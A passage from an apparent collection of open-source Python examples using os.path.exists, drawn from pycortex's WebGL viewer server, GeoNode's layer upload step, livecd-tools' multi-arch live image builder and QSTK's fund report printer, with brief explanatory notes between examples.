    """Display a dynamic viewer using the given dataset. See cortex.webgl.make_static for help.
    """
    data = dataset.normalize(data)
    if not isinstance(data, dataset.Dataset):
        data = dataset.Dataset(data=data)

    if os.path.exists(template):
        ## Load locally
        templatedir, templatefile = os.path.split(os.path.abspath(template))
        rootdirs = [templatedir, serve.cwd]
    else:
        ## Load system templates
        templatefile = template
        rootdirs = [serve.cwd]
 
    html = FallbackLoader(rootdirs).load(templatefile)
    db.auxfile = data

    #Extract the list of stimuli, for special-casing
    stims = dict()
    for name, view in data:
        if 'stim' in view.attrs and os.path.exists(view.attrs['stim']):
            sname = os.path.split(view.attrs['stim'])[1]
            stims[sname] = view.attrs['stim']

    package = Package(data)
    metadata = json.dumps(package.metadata())
    images = package.images
    subjects = list(package.subjects)

    kwargs.update(dict(method='mg2', level=9, recache=recache))
    ctms = dict((subj, utils.get_ctmpack(subj,
                                         types,
                                         disp_layers=disp_layers,
                                         extra_disp=extra_disp,
                                         **kwargs))
                for subj in subjects)

    subjectjs = json.dumps(dict((subj, "/ctm/%s/"%subj) for subj in subjects))
    db.auxfile = None

    if layout is None:
        layout = [None, (1,1), (2,1), (3,1), (2,2), (3,2), (3,2), (3,3), (3,3), (3,3)][len(subjects)]

    linear = lambda x, y, m: (1.-m)*x + m*y
    mixes = dict(
        linear=linear,
        smoothstep=(lambda x, y, m: linear(x,y,3*m**2 - 2*m**3)),
        smootherstep=(lambda x, y, m: linear(x, y, 6*m**5 - 15*m**4 + 10*m**3))
    )

    post_name = Queue.Queue()

    if pickerfun is None:
        pickerfun = lambda a,b: None

    class CTMHandler(web.RequestHandler):
        def get(self, path):
            subj, path = path.split('/')
            if path == '':
                self.set_header("Content-Type", "application/json")
                self.write(open(ctms[subj]).read())
            else:
                fpath = os.path.split(ctms[subj])[0]
                mtype = mimetypes.guess_type(os.path.join(fpath, path))[0]
                if mtype is None:
                    mtype = "application/octet-stream"
                self.set_header("Content-Type", mtype)
                self.write(open(os.path.join(fpath, path)).read())

    class DataHandler(web.RequestHandler):
        def get(self, path):
            path = path.strip("/")
            try:
                dataname, frame = path.split('/')
            except ValueError:
                dataname = path
                frame = 0

            if dataname in images:
                self.set_header("Content-Type", "image/png")
                self.write(images[dataname][int(frame)])
            else:
                self.set_status(404)
                self.write_error(404)

    class StimHandler(web.StaticFileHandler):
        def initialize(self):
            pass

        def get(self, path):
            if path not in stims:
                self.set_status(404)
                self.write_error(404)
            else:
                self.root, fname = os.path.split(stims[path])
                super(StimHandler, self).get(fname)

    class StaticHandler(web.StaticFileHandler):
        def initialize(self):
            self.root = ''

    class MixerHandler(web.RequestHandler):
        def get(self):
            self.set_header("Content-Type", "text/html")

            # Add optional extra_layers to disp_layers if provided
            if not extra_disp is None:
                svgf,dl = extra_disp
                if not isinstance(dl,(list,tuple)):
                    dl = [dl]
            else:
                dl = []
            print(disp_layers+dl)
            generated = html.generate(data=metadata,
                                      colormaps=colormaps,
                                      default_cmap=cmap,
                                      python_interface=True,
                                      layout=layout,
                                      subjects=subjectjs,
                                      disp_layers=disp_layers+dl,
                                      disp_defaults=_make_disp_defaults(disp_layers+dl),
                                      **viewopts)
            self.write(generated)

        def post(self):
            data = self.get_argument("svg", default=None)
            png = self.get_argument("png", default=None)
            with open(post_name.get(), "wb") as svgfile:
                if png is not None:
                    data = png[22:].strip()
                    try:
                        data = binascii.a2b_base64(data)
                    except:
                        print("Error writing image!")
                        data = png
                svgfile.write(data)

    class JSMixer(serve.JSProxy):
        def _set_view(self,**kwargs):
            """Low-level command: sets view parameters in the current viewer

            Sets each the state of each keyword argument provided. View parameters
            that can be set include:

            altitude, azimuth, target, mix, radius, visL, visR, pivot,
            (L/R hemisphere visibility), alpha (background alpha),
            rotationL, rotationR (L/R hemisphere rotation, [x,y,z])

            Notes
            -----
            Args must be lists instead of scalars, e.g. `azimuth`=[90]
            This could be changed, but this is a hidden function, called by
            higher-level functions that load .json files, which have the
            parameters in lists by default. So it's annoying either way.
            """
            props = ['altitude','azimuth','target','mix','radius','pivot',
                'visL','visR','alpha','rotationR','rotationL','projection',
                'volume_vis','frame','slices']
            # Set mix first, as it interacts with other arguments
            if 'mix' in kwargs:
                mix = kwargs.pop('mix')
                self.setState('mix',mix)
            for k in kwargs.keys():
                if not k in props:
                    if k=='time':
                        continue
                    print('Unknown parameter %s!'%k)
                    continue
                self.setState(k,kwargs[k][0])

        def _capture_view(self,time=None):
            """Low-level command: returns a dict of current view parameters

            Retrieves the following view parameters from current viewer:

            altitude, azimuth, target, mix, radius, visL, visR, alpha,
            rotationR, rotationL, projection, pivot

            `time` appends a 'time' key into the view (for use in animations)
            """
            props = ['altitude','azimuth','target','mix','radius','pivot',
                'visL','visR','alpha','rotationR','rotationL','projection',
                'volume_vis','frame','slices']
            view = {}
            for p in props:
                view[p] = self.getState(p)[0]
            if not time is None:
                view['time'] = time
            return view

        def save_view(self,subject,name,is_overwrite=False):
            """Saves current view parameters to pycortex database

            Parameters
            ----------
            subject : string
                pycortex subject id
            name : string
                name for view to store
            is_overwrite: bool
                whether to overwrite an extant view (default : False)

            Notes
            -----
            Equivalent to call to cortex.db.save_view(subject,vw,name)
            For a list of the view parameters saved, see viewer._capture_view

            See Also
            --------
            viewer methods get_view, _set_view, _capture_view
            """
            db.save_view(self,subject,name,is_overwrite)

        def get_view(self,subject,name):
            """Get saved view from pycortex database.

            Retrieves named view from pycortex database and sets current
            viewer parameters to retrieved values.

            Parameters
            ----------
            subject : string
                pycortex subject ID
            name : string
                name of saved view to re-load

            Notes
            -----
            Equivalent to call to cortex.db.get_view(subject,vw,name)
            For a list of the view parameters set, see viewer._capture_view

            See Also
            --------
            viewer methods save_view, _set_view, _capture_view
            """
            view = db.get_view(self,subject,name)

        def addData(self, **kwargs):
            Proxy = serve.JSProxy(self.send, "window.viewers.addData")
            new_meta, new_ims = _convert_dataset(Dataset(**kwargs), path='/data/', fmt='%s_%d.png')
            metadata.update(new_meta)
            images.update(new_ims)
            return Proxy(metadata)

        # Would like this to be here instead of in setState, but did
        # not know how to make that work...
        #def setData(self,name):
        #    Proxy = serve.JSProxy(self.send, "window.viewers.setData")
        #    return Proxy(name)

        def saveIMG(self, filename,size=(None, None)):
            """Saves currently displayed view to a .png image file

            Parameters
            ----------
            filename : string
                duh.
            size : tuple (x,y)
                size (in pixels) of image to save.
            """
            post_name.put(filename)
            Proxy = serve.JSProxy(self.send, "window.viewers.saveIMG")
            return Proxy(size[0], size[1], template)

        def makeMovie(self, animation, filename="brainmovie%07d.png", offset=0,
                      fps=30, size=(1920, 1080), interpolation="linear"):
            """Renders movie frames for animation of mesh movement

            Makes an animation (for example, a transition between inflated and
            flattened brain or a rotating brain) of a cortical surface. Takes a
            list of dictionaries (`animation`) as input, and uses the values in
            the dictionaries as keyframes for the animation.

            Mesh display parameters that can be animated include 'elevation',
            'azimuth','mix','radius','target' (more?)


            Parameters
            ----------
            animation : list of dicts
                Each dict should have keys `idx`, `state`, and `value`.
                `idx` is the time (in seconds) at which you want to set `state` to `value`
                `state` is the parameter to animate (e.g. 'altitude','azimuth')
                `value` is the value to set for `state`
            filename : string path name
                Must contain '%d' (or some variant thereof) to account for frame
                number, e.g. '/some/directory/brainmovie%07d.png'
            offset : int
                Frame number for first frame rendered. Useful for concatenating
                animations.
            fps : int
                Frame rate of resultant movie
            size : tuple (x,y)
                Size (in pixels) of resulting movie
            interpolation : {"linear","smoothstep","smootherstep"}
                Interpolation method for values between keyframes.

            Example
            -------
            # Called after a call of the form: js_handle = cortex.webgl.show(DataViewObject)
            # Start with left hemisphere view
            js_handle._setView(azimuth=[90],altitude=[90.5],mix=[0])
            # Initialize list
            animation = []
            # Append 5 key frames for a simple rotation
            for az,idx in zip([90,180,270,360,450],[0,.5,1.0,1.5,2.0]):
                animation.append({'state':'azimuth','idx':idx,'value':[az]})
            # Animate! (use default settings)
            js_handle.makeMovie(animation)
            """
            # build up two variables: State and Anim.
            # state is a dict of all values being modified at any time
            state = dict()
            # anim is a list of transitions between keyframes
            anim = []
            for f in sorted(animation, key=lambda x:x['idx']):
                if f['idx'] == 0:
                    self.setState(f['state'], f['value'])
                    state[f['state']] = dict(idx=f['idx'], val=f['value'])
                else:
                    if f['state'] not in state:
                        state[f['state']] = dict(idx=0, val=self.getState(f['state'])[0])
                    start = dict(idx=state[f['state']]['idx'],
                                 state=f['state'],
                                 value=state[f['state']]['val'])
                    end = dict(idx=f['idx'], state=f['state'], value=f['value'])
                    state[f['state']]['idx'] = f['idx']
                    state[f['state']]['val'] = f['value']
                    if start['value'] != end['value']:
                        anim.append((start, end))

            for i, sec in enumerate(np.arange(0, anim[-1][1]['idx']+1./fps, 1./fps)):
                for start, end in anim:
                    if start['idx'] < sec <= end['idx']:
                        idx = (sec - start['idx']) / float(end['idx'] - start['idx'])
                        if start['state'] == 'frame':
                            func = mixes['linear']
                        else:
                            func = mixes[interpolation]

                        val = func(np.array(start['value']), np.array(end['value']), idx)
                        if isinstance(val, np.ndarray):
                            self.setState(start['state'], val.ravel().tolist())
                        else:
                            self.setState(start['state'], val)
                self.saveIMG(filename%(i+offset), size=size)

        def _get_anim_seq(self,keyframes,fps=30,interpolation='linear'):
            """Convert a list of keyframes to a list of EVERY frame in an animation.

            Utility function called by make_movie; separated out so that individual
            frames of an animation can be re-rendered, or for more control over the
            animation process in general.

            """
            # Misc. setup
            fr = 0
            a = np.array
            func = mixes[interpolation]
            skip_props = ['projection','visR','visL',]
            # Get keyframes
            keyframes = sorted(keyframes, key=lambda x:x['time'])
            # Normalize all time to frame rate
            fs = 1./fps
            for k in range(len(keyframes)):
                t = keyframes[k]['time']
                t = np.round(t/fs)*fs
                keyframes[k]['time'] = t
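                # e.g. at fps=30 (fs ~= 0.0333 s) a keyframe at t = 0.49 s is
                # snapped to 0.5 s, i.e. exactly frame 15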
            allframes = []
            for start,end in zip(keyframes[:-1],keyframes[1:]):
                t0 = start['time']
                t1 = end['time']
                tdif = float(t1-t0)
                # Check whether to continue frame sequence to endpoint
                use_endpoint = keyframes[-1]==end
                nvalues = np.round(tdif/fs)
                if use_endpoint:
                    nvalues +=1
                fr_time = np.linspace(0,1,nvalues,endpoint=use_endpoint)
                # Interpolate between values
                for t in fr_time:
                    frame = {}
                    for prop in start.keys():
                        if prop=='time':
                            continue
                        if (prop in skip_props) or (start[prop][0] is None):
                            frame[prop] = start[prop]
                            continue
                        val = func(a(start[prop]), a(end[prop]), t)
                        if isinstance(val, np.ndarray):
                            frame[prop] = val.tolist()
                        else:
                            frame[prop] = val
                    allframes.append(frame)
            return allframes

        def make_movie_views(self, animation, filename="brainmovie%07d.png", offset=0,
                      fps=30, size=(1920, 1080), interpolation="linear"):
            """Renders movie frames for animation of mesh movement

            Makes an animation (for example, a transition between inflated and
            flattened brain or a rotating brain) of a cortical surface. Takes a
            list of dictionaries (`animation`) as input, and uses the values in
            the dictionaries as keyframes for the animation.

            Mesh display parameters that can be animated include 'elevation',
            'azimuth','mix','radius','target' (more?)


            Parameters
            ----------
            animation : list of dicts
                This is a list of keyframes for the animation. Each keyframe should be
                a dict in the form captured by the ._capture_view method. NOTE: every
                view must include all view parameters. Additionally, there should be
                one extra key/value pair for "time". The value for time should be
                in seconds. The list of keyframes is sorted by time before applying,
                so they need not be in order in the input.
            filename : string path name
                Must contain '%d' (or some variant thereof) to account for frame
                number, e.g. '/some/directory/brainmovie%07d.png'
            offset : int
                Frame number for first frame rendered. Useful for concatenating
                animations.
            fps : int
                Frame rate of resultant movie
            size : tuple (x,y)
                Size (in pixels) of resulting movie
            interpolation : {"linear","smoothstep","smootherstep"}
                Interpolation method for values between keyframes.

            Notes
            -----
            Make sure that all values that will be modified over the course
            of the animation are initialized (have some starting value) in the first
            frame.

            Example
            -------
            # Called after a call of the form: js_handle = cortex.webgl.show(DataViewObject)
            # Start with left hemisphere view
            js_handle._setView(azimuth=[90],altitude=[90.5],mix=[0])
            # Initialize list
            animation = []
            # Append 5 key frames for a simple rotation
            for az,t in zip([90,180,270,360,450],[0,.5,1.0,1.5,2.0]):
                animation.append({'time':t,'azimuth':[az]})
            # Animate! (use default settings)
            js_handle.make_movie(animation)
            """
            import time
            allframes = self._get_anim_seq(animation,fps,interpolation)
            for fr,frame in enumerate(allframes):
                self._set_view(**frame)
                self.saveIMG(filename%(fr+offset+1), size=size)
                time.sleep(.01)

    class PickerHandler(web.RequestHandler):
        def get(self):
            pickerfun(int(self.get_argument("voxel")), int(self.get_argument("vertex")))

    class WebApp(serve.WebApp):
        disconnect_on_close = autoclose
        def get_client(self):
            self.connect.wait()
            self.connect.clear()
            return JSMixer(self.send, "window.viewers")

        def get_local_client(self):
            return JSMixer(self.srvsend, "window.viewers")

    if port is None:
        port = random.randint(1024, 65536)

    server = WebApp([
            (r'/ctm/(.*)', CTMHandler),
            (r'/data/(.*)', DataHandler),
            (r'/stim/(.*)', StimHandler),
            (r'/'+template, MixerHandler),
            (r'/picker', PickerHandler),
            (r'/', MixerHandler),
            (r'/static/(.*)', StaticHandler),
        ], port)
    server.start()
    print("Started server on port %d"%server.port)
    if open_browser:
        webbrowser.open("http://%s:%d/%s"%(serve.hostname, server.port, template))
        client = server.get_client()
        client.server = server
        return client
    else:
        try:
            from IPython.display import display, HTML
            link = "http://%s:%d/%s" % (serve.hostname, server.port, template)
            display(HTML('Open viewer: <a href="{0}" target="_blank">{0}</a>'.format(link)))
        except:
            pass
        return server
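
The template handling at the top of Example 111 is another recurring os.path.exists idiom: if the caller passed a path to an existing file, search its directory first; otherwise treat the argument as the name of a bundled template and search only the package directory. A small sketch of that resolution step follows; the directory names are placeholders rather than pycortex's actual serve.cwd.

import os

def resolve_template(template, package_dir):
    """Return (template_filename, search_dirs) for a template loader."""
    if os.path.exists(template):
        # caller passed a path to a real file: search its directory first
        template_dir, template_file = os.path.split(os.path.abspath(template))
        return template_file, [template_dir, package_dir]
    # otherwise treat the argument as the name of a bundled template
    return template, [package_dir]

# hypothetical usage:
# fname, roots = resolve_template("mixer.html", "/usr/share/myviewer/templates")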

Example 112

Project: geonode
Source File: upload.py
View license
def final_step(upload_session, user):
    from geonode.geoserver.helpers import get_sld_for
    import_session = upload_session.import_session
    _log('Reloading session %s to check validity', import_session.id)
    import_session = import_session.reload()
    upload_session.import_session = import_session

    # the importer chooses an available featuretype name late in the game need
    # to verify the resource.name otherwise things will fail.  This happens
    # when the same data is uploaded a second time and the default name is
    # chosen

    cat = gs_catalog
    cat._cache.clear()

    # Create the style and assign it to the created resource
    # FIXME: Put this in gsconfig.py

    task = import_session.tasks[0]

    # @todo see above in save_step, regarding computed unique name
    name = task.layer.name

    _log('Getting from catalog [%s]', name)
    publishing = cat.get_layer(name)

    if import_session.state == 'INCOMPLETE':
        if task.state != 'ERROR':
            raise Exception('unknown item state: %s' % task.state)
    elif import_session.state == 'PENDING':
        if task.state == 'READY' and task.data.format != 'Shapefile':
            import_session.commit()

    if not publishing:
        raise LayerNotReady("Expected to find layer named '%s' in geoserver" % name)

    _log('Creating style for [%s]', name)
    # get_files will not find the sld if it doesn't match the base name
    # so we've worked around that in the view - if provided, it will be here
    if upload_session.import_sld_file:
        _log('using provided sld file')
        base_file = upload_session.base_file
        sld_file = base_file[0].sld_files[0]

        f = open(sld_file, 'r')
        sld = f.read()
        f.close()
    else:
        sld = get_sld_for(publishing)

    style = None
    print " **************************************** "
    if sld is not None:
        try:
            cat.create_style(name, sld)
            style = cat.get_style(name)
        except geoserver.catalog.ConflictingDataError as e:
            msg = 'There was already a style named %s in GeoServer, try using another name: "%s"' % (
                name, str(e))
            try:
                cat.create_style(name + '_layer', sld)
                style = cat.get_style(name + '_layer')
            except geoserver.catalog.ConflictingDataError as e:
                msg = 'There was already a style named %s in GeoServer, cannot overwrite: "%s"' % (
                    name, str(e))
                logger.error(msg)
                e.args = (msg,)

                # what are we doing with this var?
                msg = 'No style could be created for the layer, falling back to POINT default one'
                style = cat.get_style('point')
                logger.warn(msg)
                e.args = (msg,)

        # FIXME: Should we use the fully qualified typename?
        publishing.default_style = style
        _log('default style set to %s', name)
        cat.save(publishing)

    _log('Creating Django record for [%s]', name)
    target = task.target
    typename = task.get_target_layer_name()
    layer_uuid = str(uuid.uuid1())

    title = upload_session.layer_title
    abstract = upload_session.layer_abstract

    # @todo hacking - any cached layers might cause problems (maybe
    # delete hook on layer should fix this?)
    cat._cache.clear()

    # Is it a regular file or an ImageMosaic?
    # if upload_session.mosaic_time_regex and upload_session.mosaic_time_value:
    if upload_session.mosaic:

        import pytz
        import datetime
        from geonode.layers.models import TIME_REGEX_FORMAT

        # llbbox = publishing.resource.latlon_bbox
        start = None
        end = None
        if upload_session.mosaic_time_regex and upload_session.mosaic_time_value:
            has_time = True
            start = datetime.datetime.strptime(upload_session.mosaic_time_value,
                                               TIME_REGEX_FORMAT[upload_session.mosaic_time_regex])
            start = pytz.utc.localize(start, is_dst=False)
            end = start
        else:
            has_time = False

        if not upload_session.append_to_mosaic_opts:
            saved_layer, created = Layer.objects.get_or_create(
                name=task.layer.name,
                defaults=dict(store=target.name,
                              storeType=target.store_type,
                              typename=typename,
                              workspace=target.workspace_name,
                              title=title,
                              uuid=layer_uuid,
                              abstract=abstract or '',
                              owner=user,),
                temporal_extent_start=start,
                temporal_extent_end=end,
                is_mosaic=True,
                has_time=has_time,
                has_elevation=False,
                time_regex=upload_session.mosaic_time_regex
            )
        else:
            # saved_layer = Layer.objects.filter(name=upload_session.append_to_mosaic_name)
            # created = False
            saved_layer, created = Layer.objects.get_or_create(name=upload_session.append_to_mosaic_name)
            try:
                if saved_layer.temporal_extent_start and end:
                    if pytz.utc.localize(saved_layer.temporal_extent_start, is_dst=False) < end:
                        saved_layer.temporal_extent_end = end
                        Layer.objects.filter(name=upload_session.append_to_mosaic_name).update(
                            temporal_extent_end=end)
                    else:
                        saved_layer.temporal_extent_start = end
                        Layer.objects.filter(name=upload_session.append_to_mosaic_name).update(
                            temporal_extent_start=end)
            except Exception as e:
                _log('There was an error updating the mosaic temporal extent: ' + str(e))
    else:
        saved_layer, created = Layer.objects.get_or_create(
            name=task.layer.name,
            defaults=dict(store=target.name,
                          storeType=target.store_type,
                          typename=typename,
                          workspace=target.workspace_name,
                          title=title,
                          uuid=layer_uuid,
                          abstract=abstract or '',
                          owner=user,)
        )

    # Should we throw a clearer error here?
    assert saved_layer is not None

    # @todo if layer was not created, need to ensure upload target is
    # same as existing target

    _log('layer was created : %s', created)

    if created:
        saved_layer.set_default_permissions()

    # Create the points of contact records for the layer
    _log('Creating points of contact records for [%s]', name)
    saved_layer.poc = user
    saved_layer.metadata_author = user

    # look for xml
    xml_file = upload_session.base_file[0].xml_files
    if xml_file:
        saved_layer.metadata_uploaded = True
        # get model properties from XML
        identifier, vals, regions, keywords = set_metadata(open(xml_file[0]).read())

        regions_resolved, regions_unresolved = resolve_regions(regions)
        keywords.extend(regions_unresolved)

        # set regions
        regions_resolved = list(set(regions_resolved))
        if regions:
            if len(regions) > 0:
                saved_layer.regions.add(*regions_resolved)

        # set taggit keywords
        keywords = list(set(keywords))
        saved_layer.keywords.add(*keywords)

        # set model properties
        for (key, value) in vals.items():
            if key == "spatial_representation_type":
                # value = SpatialRepresentationType.objects.get(identifier=value)
                pass
            else:
                setattr(saved_layer, key, value)

        saved_layer.save()

    # Set default permissions on the newly created layer
    # FIXME: Do this as part of the post_save hook

    permissions = upload_session.permissions
    if created and permissions is not None:
        _log('Setting default permissions for [%s]', name)
        saved_layer.set_permissions(permissions)

    if upload_session.tempdir and os.path.exists(upload_session.tempdir):
        shutil.rmtree(upload_session.tempdir)

    upload = Upload.objects.get(import_id=import_session.id)
    upload.layer = saved_layer
    upload.complete = True
    upload.save()

    if upload_session.time_info:
        set_time_info(saved_layer, **upload_session.time_info)

    signals.upload_complete.send(sender=final_step, layer=saved_layer)

    return saved_layer
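
The last os.path.exists call in this example is the cleanup guard: the temporary upload directory is only removed with shutil.rmtree if it is still on disk. A minimal, self-contained sketch of that pattern, using a hypothetical cleanup_tempdir helper in place of GeoNode's upload_session:

import os
import shutil
import tempfile

def cleanup_tempdir(temp_dir):
    # rmtree raises if the path is missing, so check first,
    # just as the example does for upload_session.tempdir.
    if temp_dir and os.path.exists(temp_dir):
        shutil.rmtree(temp_dir)

# Usage: the second call is a harmless no-op.
work_dir = tempfile.mkdtemp()
cleanup_tempdir(work_dir)
cleanup_tempdir(work_dir)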

Example 113

Project: livecd-tools
Source File: mkbiarch.py
View license
def main():


    def usage():
        usage = 'usage: mkbiarch.py <x86 Live ISO File> <x64 Live ISO File> <Target Multi Arch Image File>'
        print >> sys.stdout, usage


    def mount(src, dst, options=None):
        if os.path.exists(src):
            if not os.path.exists(dst):
                os.makedirs(dst)
            if options is None:
                args = ("/bin/mount", src, dst)
            else:
                args = ("/bin/mount", options, src, dst)
            rc = subprocess.call(args)
            return rc
        return


    def umount(src):
        if os.path.exists(src):
                args = ("/bin/umount", src)
                rc = subprocess.call(args)
                return rc
        return


    def copy(src, dst):
        if os.path.exists(src):
            if not os.path.exists(dst):
                if not os.path.isfile(src):
                    mkdir(dst)
            shutil.copy(src, dst)


    def move(src, dst):
        if os.path.exists(src):
            shutil.move(src, dst)

    def mkdir(dir=None):
        if dir is None:
            tmp = tempfile.mkdtemp()
            return tmp
        else:
            args = ("/bin/mkdir", "-p", dir)
            rc = subprocess.call(args)


    def losetup(src, dst, offset=None):
        rc = None
        if os.path.exists(src):
            if os.path.exists(dst):
                if offset is None:
                    args = ("/sbin/losetup", src, dst)
                else:
                    args = ("/sbin/losetup", "-o", str(offset), src, dst)
                rc = subprocess.call(args)
        return rc

    def lounset(device):
        args = ("/sbin/losetup", "-d", device)
        rc = subprocess.call(args) 

    def null():
        fd = open(os.devnull, 'w')
        return fd

    def dd(file, target):
        args = ("/bin/dd", "if=%s"%file, "of=%s"%target)
        rc = subprocess.call(args)

    def lo():
        args = ("/sbin/losetup", "--find")
        rc = subprocess.Popen(args, stdout=subprocess.PIPE).communicate()[0].rstrip()
        return rc

    def lodev(file):
        args = ("/sbin/losetup", "-j", file)
        rc = subprocess.Popen(args, stdout=subprocess.PIPE).communicate()[0].split(":")
        return rc[0]


    def mkimage(bs, count):
        tmp = tempfile.mkstemp()
        image = tmp[1]
        args = ("/bin/dd", "if=/dev/zero",
                 "of=%s"%image, "bs=%s"%bs,
                 "count=%s"%count)
        rc = subprocess.call(args)
        return image


    def size(ent):
        if os.path.exists(ent):
            return os.stat(ent).st_size

    def bs(size):
        return size / 2048

    def partition(device):
        dev = parted.Device(path=device)
        disk = parted.freshDisk(dev, 'msdos')
        constraint = parted.Constraint(device=dev)

        new_geom = parted.Geometry(device=dev,
                                   start=1,
                                   end=(constraint.maxSize - 1))
        filesystem = parted.FileSystem(type="ext2",
                                       geometry=new_geom)
        partition = parted.Partition(disk=disk,
                                     fs=filesystem,
                                     type=parted.PARTITION_NORMAL,
                                     geometry=new_geom)
        constraint = parted.Constraint(exactGeom=new_geom)
        partition.setFlag(parted.PARTITION_BOOT)
        disk.addPartition(partition=partition,
                          constraint=constraint)
        
        disk.commit()

    def format(partition):
        args = ("/sbin/mke2fs", "-j", partition)
        rc = subprocess.call(args)

    def mbr(target):
        mbr = "/usr/share/syslinux/mbr.bin"
        dd(mbr, target)

    def getuuid(device):
        args = ("/sbin/blkid", "-s", "UUID", "-o", "value", device)
        rc = subprocess.Popen(args, stdout=subprocess.PIPE).communicate()[0].rstrip()
        return rc

    def syslinux(multitmp, config, **args):
        arg = ("/sbin/extlinux", "--install", multitmp + "/extlinux/")
        rc = subprocess.call(arg)

        content = """
        default vesamenu.c32
        timeout 100

        menu background splash.jpg
        menu title Welcome to Fedora 13
        menu color border 0 #ffffffff #00000000
        menu color sel 7 #ffffffff #ff000000
        menu color title 0 #ffffffff #00000000
        menu color tabmsg 0 #ffffffff #00000000
        menu color unsel 0 #ffffffff #00000000
        menu color hotsel 0 #ff000000 #ffffffff
        menu color hotkey 7 #ffffffff #ff000000
        menu color timeout_msg 0 #ffffffff #00000000
        menu color timeout 0 #ffffffff #00000000
        menu color cmdline 0 #ffffffff #00000000
        menu hidden
        menu hiddenrow 5

        label Fedora-13-x86
        menu label Fedora-13-x86
        kernel vmlinuz0
        append initrd=initrd0.img root=UUID=%(uuid)s rootfstype=auto ro live_dir=/x86/LiveOS liveimg
        
        label Fedora-13-x64
        menu label Fedora-13-x64
        kernel vmlinuz1
        append initrd=initrd1.img root=UUID=%(uuid)s rootfstype=auto ro live_dir=/x64/LiveOS liveimg
        """ % args
        fd = open(config, 'w')
        fd.write(content)
        fd.close()

    def verify():
        # use md5 module to verify image files
        pass

    def setup(x86, x64, multi):

        sz = size(x86) + size(x64)
        count = bs(sz)
        blsz = str(2048)

        count = count + 102400

        multi = mkimage(blsz, count)    
        losetup(lo(), multi)
 
        mbr(lodev(multi))
        partition(lodev(multi))
 
        lounset(lodev(multi))
     
        losetup(lo(), multi, offset=512)
        format(lodev(multi))

        multitmp = mkdir()
        mount(lodev(multi), multitmp)

        losetup(lo(), x86)
        losetup(lo(), x64)
 
        x86tmp = mkdir()
        x64tmp = mkdir()

        mount(lodev(x86), x86tmp)
        mount(lodev(x64), x64tmp)


        dirs = ("/extlinux/", "/x86/", "/x64/")
        for dir in dirs:
            mkdir(multitmp + dir)
        dirs = ("/x86/", "/x64/")
        for dir in dirs:
            mkdir(multitmp + dir + "/LiveOS/")

        intermediate = tempfile.mkdtemp() # loopdev performance is slow
                                          # copy to here first then back
                                          # to multitmp + dir which is loopback also

        imgs = ("squashfs.img", "osmin.img")
        for img in imgs:
            copy(x86tmp + "/LiveOS/" + img, intermediate)
            copy(intermediate + "/" + img, multitmp + "/x86/LiveOS/")
        for img in imgs:
            copy(x64tmp + "/LiveOS/" + img, intermediate)
            copy(intermediate + "/" + img, multitmp + "/x64/LiveOS/")

        for file in os.listdir(x86tmp + "/isolinux/"):
            copy(x86tmp + "/isolinux/" + file, multitmp + "/extlinux/")

        copy(x64tmp + "/isolinux/vmlinuz0", multitmp + "/extlinux/vmlinuz1")
        copy(x64tmp + "/isolinux/initrd0.img", multitmp + "/extlinux/initrd1.img")
            

       
        uuid = getuuid(lodev(multi))

  
        config = (multitmp + "/extlinux/extlinux.conf")
        syslinux(multitmp,
                 config,
                 uuid=uuid)



        umount(x86tmp)
        umount(x64tmp)
        umount(multitmp)

        lounset(lodev(x86))
        lounset(lodev(x64))
        lounset(lodev(multi))

        shutil.rmtree(x86tmp)
        shutil.rmtree(x64tmp)
        shutil.rmtree(multitmp)
        shutil.rmtree(intermediate)   
        


        if os.path.exists(sys.argv[3]):
            os.unlink(sys.argv[3])
        move(multi, sys.argv[3])
 

    def parse(x86, x64, multi):
        for file in x86, x64:
            if os.path.exists(file):
                pass
            else:
                usage()
        if not multi:
            usage()
        setup(x86, x64, multi)





    try: 
        parse(sys.argv[1], sys.argv[2], sys.argv[3])
    except:
        usage()
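
Nearly every helper in this example (mount, umount, copy, move, losetup, size) opens with an os.path.exists check before touching the path or shelling out. A condensed sketch of that guard style, with generic safe_copy/safe_umount names rather than the loop-device specifics of mkbiarch.py:

import os
import shutil
import subprocess

def safe_copy(src, dst):
    # Copy only when the source actually exists; create the destination
    # directory first if it is missing (compare copy()/mkdir() above).
    if not os.path.exists(src):
        return False
    dst_dir = os.path.dirname(dst) or "."
    if not os.path.exists(dst_dir):
        os.makedirs(dst_dir)
    shutil.copy(src, dst)
    return True

def safe_umount(mount_point):
    # Call the external command only if the mount point exists,
    # mirroring the umount() helper above.
    if os.path.exists(mount_point):
        return subprocess.call(["/bin/umount", mount_point])
    return None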

Example 114

Project: QSTK
Source File: report.py
View license
def print_stats(fund_ts, benchmark, name, lf_dividend_rets=0.0, original="",s_fund_name="Fund",
    s_original_name="Original", d_trading_params="", d_hedge_params="", s_comments="", directory = False,
    leverage = False, s_leverage_name="Leverage", commissions = 0, slippage = 0, borrowcost = 0, ostream = sys.stdout, 
    i_start_cash=1000000, ts_turnover="False"):
    """
    @summary prints stats of a provided fund and benchmark
    @param fund_ts: fund value in pandas timeseries
    @param benchmark: benchmark symbol to compare fund to
    @param name: name to associate with the fund in the report
    @param directory: parameter to specify printing to a directory
    @param leverage: time series to plot with report
    @param commissions: value to print with report
    @param slippage: value to print with report
    @param ostream: stream to print stats to, defaults to stdout
    """

    #Set locale for currency conversions
    locale.setlocale(locale.LC_ALL, '')

    if original != "" and type(original) != type([]):
        original = [original]
        if type(s_original_name) != type([]):
            s_original_name = [s_original_name]

    #make names length independent for alignment
    s_formatted_original_name = []
    for name_temp in s_original_name:
        s_formatted_original_name.append("%15s" % name_temp)
    s_formatted_fund_name = "%15s" % s_fund_name

    fund_ts=fund_ts.fillna(method='pad')
    fund_ts=fund_ts.fillna(method='bfill')
    fund_ts=fund_ts.fillna(1.0)
    if directory != False :
        if not path.exists(directory):
            makedirs(directory)

        sfile = path.join(directory, "report-%s.html" % name )
        splot = "plot-%s.png" % name
        splot_dir =  path.join(directory, splot)
        ostream = open(sfile, "wb")
        ostream.write("<pre>")
        print "writing to ", sfile

        if type(original)==type("str"):
            if type(leverage)!=type(False):
                print_plot(fund_ts, benchmark, name, splot_dir, lf_dividend_rets, leverage=leverage, i_start_cash = i_start_cash, s_leverage_name=s_leverage_name)
            else:
                print_plot(fund_ts, benchmark, name, splot_dir, lf_dividend_rets, i_start_cash = i_start_cash)
        else:
            if type(leverage)!=type(False):
                print_plot([fund_ts, original], benchmark, name, splot_dir, s_original_name, lf_dividend_rets,
                             leverage=leverage, i_start_cash = i_start_cash, s_leverage_name=s_leverage_name)
            else:
                print_plot([fund_ts, original], benchmark, name, splot_dir, s_original_name, lf_dividend_rets, i_start_cash = i_start_cash)

